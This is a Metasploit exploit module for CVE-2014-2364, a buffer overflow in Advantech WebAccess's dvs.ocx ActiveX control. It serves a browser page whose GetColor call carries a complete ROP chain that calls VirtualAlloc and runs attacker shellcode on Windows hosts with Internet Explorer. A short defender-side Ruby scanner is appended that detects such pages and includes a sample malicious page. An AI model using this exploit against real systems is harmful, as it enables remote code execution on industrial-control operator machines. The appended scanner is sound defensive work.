##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow vulnerability in Advantech
        WebAccess. The vulnerability exists in the dvs.ocx ActiveX control,
        where a dangerous call to sprintf can be reached with user controlled
        data through the GetColor function. This module has been tested
        successfully on Windows XP SP3 with IE6 and Windows 7 SP1 with IE8
        and IE 9.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery
          'juan vazquez'  # Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2014-2364'],
          ['ZDI', '14-255'],
          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
        ],
      'DefaultOptions' =>
        {
          'Retries'              => false,
          'InitialAutoRunScript' => 'migrate -f'
        },
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => /MSIE/i,
          :ua_ver  => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },
          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
          :method  => "GetColor"
        },
      'Payload'        =>
        {
          'Space'          => 1024,
          'DisableNops'    => true,
          'BadChars'       => "\x00\x0a\x0d\x5c",
          # Patch the stack to execute the decoder...
          'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
          # Fix the stack again, this time better :), before the payload
          # is executed.
          'Prepend'        => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                              "\x83\xC0\x08" +             # add eax, byte 8
                              "\x8b\x20" +                 # mov esp, [eax]
                              "\x81\xC4\x30\xF8\xFF\xFF"   # add esp, -2000
        },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 17 2014'))
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")

    # The served page instantiates the vulnerable control and passes the
    # ROP chain plus payload as the first (string) argument of GetColor.
    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test'></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
    EOS

    print_status("Sending #{self.name}")
    send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end

  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
    xpl = rand_text_alphanumeric(61)  # offset
    xpl << [0x60014185].pack("V")     # RET
    xpl << rand_text_alphanumeric(8)

    # EBX = dwSize (0x40)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdafc9].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10
    xpl << [0x60018084].pack("V") # POP EBP # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN)
    xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret #

    # EDX = flAllocationType (0x1000)
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << [0x9ffdbf89].pack("V") # eax value
    xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10

    # ECX = flProtect (0x40)
    xpl << [0x6002157e].pack("V") # POP EAX # RETN
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << rand_text_alphanumeric(4) # padding
    xpl << [0x60029f6c].pack("V") # .data ijl11.dll
    xpl << [0x60012288].pack("V") # POP ECX # RETN
    xpl << [0xffffffff].pack("V") # ecx value
    0x41.times do
      xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
    end

    # EAX = ptr to &VirtualAlloc()
    xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll]
    xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll]

    # EBP = POP (skip 4 bytes)
    xpl << [0x6002054b].pack("V") # POP EBP # RETN
    xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn)

    # ESI = ptr to JMP [EAX]
    xpl << [0x600181cc].pack("V") # POP ESI # RETN
    xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax])

    # EDI = ROP NOP (RETN)
    xpl << [0x60021ad1].pack("V") # POP EDI # RETN
    xpl << [0x60021ad2].pack("V") # ptr to &(retn)

    # ESP = lpAddress (automatic)

    # PUSHAD # RETN
    xpl << [0x60018399].pack("V") # PUSHAD # RETN
    xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn)

    xpl << code

    xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string
    xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping

    xpl
  end

end
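As an added defender-side example (not part of the Metasploit module above), the following Ruby scanner flags a captured HTML/JavaScript page that instantiates the dvs.ocx control by its CLSID and calls GetColor with an oversized first argument, which is the string that reaches the sprintf call. The 61-byte threshold is taken from the module's own offset before the return address; the sample pages and the helper names are constructed for this example.

```ruby
# Added example, not part of the Metasploit module above: a defender-side scanner
# that flags HTML/JavaScript instantiating the vulnerable dvs.ocx control and
# calling GetColor with an oversized first argument (the sprintf input).
# The 61-byte threshold is taken from the module's own offset before the
# return address; the sample pages below are constructed for this example.

DVS_CLSID = '5CE92A27-9F6A-11D2-9D3D-000001155641'
SAFE_LEN  = 61 # bytes the module places before overwriting the return address

# Matches `.GetColor("...", ...)` or `.GetColor('...', ...)` and captures the string
# argument, honouring backslash escapes so an escaped quote does not end it.
GETCOLOR_CALL = /\.GetColor\s*\(\s*(?:"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)')\s*,/m

# Returns a hash: was the control instantiated, how many GetColor calls were
# seen, and the decoded byte length of every argument longer than max_len.
def scan_for_dvs_getcolor(content, max_len = SAFE_LEN)
  result = { clsid_present: false, getcolor_calls: 0, oversized: [] }
  result[:clsid_present] = content.match?(/clsid:#{Regexp.escape(DVS_CLSID)}/i)

  content.scan(GETCOLOR_CALL) do |dq, sq|
    result[:getcolor_calls] += 1
    raw = (dq || sq).gsub(/\\(.)/m) { $1 } # undo JavaScript string escaping
    result[:oversized] << raw.bytesize if raw.bytesize > max_len
  end
  result
end

# True when the control is present and at least one GetColor argument could
# overflow the sprintf destination.
def suspicious?(content)
  r = scan_for_dvs_getcolor(content)
  r[:clsid_present] && !r[:oversized].empty?
end

# Constructed samples modelled on the HTML the module serves.
MALICIOUS_PAGE = <<~HTML
  <object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test'></object>
  <script language='javascript'>
  test.GetColor("#{'A' * 200}", 0);
  </script>
HTML

BENIGN_PAGE = <<~HTML
  <object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='dvs'></object>
  <script>dvs.GetColor("#FF0000", 0);</script>
HTML

puts suspicious?(MALICIOUS_PAGE) # true
puts suspicious?(BENIGN_PAGE)    # false
```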